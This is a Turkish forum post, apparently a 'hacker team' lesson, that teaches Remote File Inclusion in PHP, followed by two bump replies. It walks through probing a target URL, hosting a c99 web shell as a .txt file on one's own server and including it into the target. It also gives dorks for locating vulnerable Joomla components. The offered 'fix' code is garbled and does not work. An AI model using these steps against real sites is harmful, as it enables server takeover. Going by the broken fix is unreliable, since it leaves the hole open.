tümü

inci sözlük hacker team ders4

  1. 1.
    0
    inci sözlük hacker team kuruldu

    Bu makalemizde size rfı, açıklarının nasıl meydana geldiğini, uzaktan dosya çağırma işlemini, shell çağırma yöntemini rfı, açığını nasıl fixleyeceğimizi (kapatabileceğimizi) kodlarla ve örneklerle anlatmaya çalışacağım.

    Bildiğiniz üzere (Remota File inclusion) uzaktan dosya çağırmak anldıbına gelmektedir.

    1-RFI açığı nasıl oluşur
    2-Tanımlama nasıl yapılır
    3-RFI Açığı Tesbiti
    4-Shell Dahil Etmek
    5-Örnek RFI bug
    6-Örnek RFI Fix
    7-RFI Açıkları nasıl bulunur.

    1-Rfı açığı nasıl oluşur?

    RFI, web uyguklamalarındaki hatalı kodlamadan dolayı oluşur. Bir kodla örnek verecek olursak;

    include (“$haberler/spor/sanat.php); buradaki dolar işaretinden dolayı uzaktan dosya çağırma mümkündür. Kodlama bu şekilde tanımlanmadan scripte dahil edilirse, kesinlikle uzaktan dosya çağırmaya Başka bir örnekle pekiştirelim.

    include
    include_once
    require
    require_once

    Scripti kodlayan kişi tanımlamadan bu kodları scripte dahil ederse, uzaktan dosya çağırma işlemi mümkün olmuş, olur.

    2-Tanımlama nasıl yapılır

    include ("$haberler/spor/sanat.php"); Tanımlanmamış kod.
    <?php
    $haberler/spor/sanat.php =’tanımlı değer’
    include ("$haberler/spor/sanat.php");
    ?>

    Bu şekilde haberler, spor, sanat üçlüsünü tanımlamış olduk.

    3-Rfı açığı tespiti

    Hedef siteyi açtığınızda rfı açığı olup olmadığını anlamak için siteye hata verdirmeniz, gerekmektedir

    Örneğin;

    http://www.hedefsite.com/articles.php?id=10
    http://www.hedefsite.com/...les.php?id=http://tht.net bu şekilde yönlendirmeye çalışıyoruz. Siz istediğiniz sayfaya yönlendirebilirsiniz. Şayet cw’nin anasayfası gelirse, bu sitede rfı açığı var demektir. Bazı rfı açıklarında ise sitenin kendi üzerinde hata vermektedir. Bu sitelerde de rfı arnılabilir. Evet açığı olduğunu düşündüğümüz shell çağırma işlemimizi deneyebiliriz.

    4-Shell Dahil Etmek

    Burada shell çağırırken yukarıda bahsetmiş olduğumuz yönlendirme işlemini gerçekleştireceğiz. Öncelikle kendi hotsunuza txt halinde shell yüklemeniz gerekiyor. Host adresiniz free olabilir. Örneğin; c99.txt şeklinde. Daha sonra uzaktan bu txt dosyasını yönlendirme işlemi ile hedef sitemize dahil edeceğiz.

    http://www.hedefsite.com/articles.ph ... z.net/c99.txt?
    Evet bu şekilde sitenize yüklediğiniz txt uzantılı shell’i hedef siteye yüklemiş olursunuz.

    5-Örnek Rfı bug

    Eğer scriptlerde rfı bug arıyorsanız, bunları iyi bilmeniz gerekmektedir. Örnek bir rfı bug yapalım.

    <?php
    $page = $_GET [page]; Rfı açığı burada page değerinde
    include($page);
    ?>

    6-Örnek RFI Fix

    Scriptlerdeki bugları bu konuda verilmiş örnekleri baz alarak kapatabilirsiniz.
    <?php
    $page = $_GET"./"; Bu kodlamalar ile rfı açığımızı fixlemiş olduk.
    include($page);
    ?>

    7-RFI Açıkları nasıl bulunur

    RFI, açıklarını mevcut dorklarla ve scannerlerle bulabilirsiniz.

    Örnek Dorklar;

    inurl:"com_sitemap"
    inurl:"com_hashcash"
    inurl:"com_colophon" vs..

    Ayrıca hedef site üzerinde rfı açığından şüpheleniyorsanız, scannerlerle taratabilirsiniz. Ya da örneklerlede belirttiğimiz gibi manuel açık arayabilirsiniz. Tercihinize kalmış. Şimdilik dökümanımız bu kadar.
    Tümünü Göster
    ···
    #110753900 şikayet
  2. 2.
    0
    upppp upppppppppppp
    ···
    #110754196 şikayet
  3. 3.
    0
    işinize yarayabilir diye düşündüm amk
    ···
    #110754355 şikayet